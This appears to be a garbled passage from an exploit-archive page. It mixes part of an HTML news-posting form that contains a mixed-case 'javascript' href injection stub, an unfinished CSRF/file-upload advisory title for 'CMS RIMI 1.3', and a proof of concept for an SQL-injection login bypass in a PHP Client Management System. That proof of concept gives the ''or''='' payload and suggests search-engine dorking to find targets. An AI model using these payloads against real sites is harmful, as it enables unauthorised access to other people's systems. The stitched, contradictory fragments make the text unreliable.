HrEF=jaVaScRiP</option></select>  <p class="error-form"></p>  
  </div>  
  <div class="form-group">  
    <label>Status:</label>  
    <select class="form-control" name="status_berita" id="status_berita">  
      <option value="Diterbitkan">Diterbitkan</option>  
      <option value="Draft">Draft</option>  
    </select>  
  </div>  
  <div class="form-group">  
      <label>Gambar Berita</label>  
      <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">  
      <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">  
  <p class="error-form"></p>  
  </div>  
  <button type="submit" class="btn btn-primary">Submit</button>  
</form>  
  <p class="error-form"></p>    
  <p class="error-form"></p>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

CMS RIMI 1.3 Cross Site Request Forgery / File Upload

Client Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Client ms Project 1.0 Auth By Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/client-management-system-using-php-mysql/                                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/CCMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#auth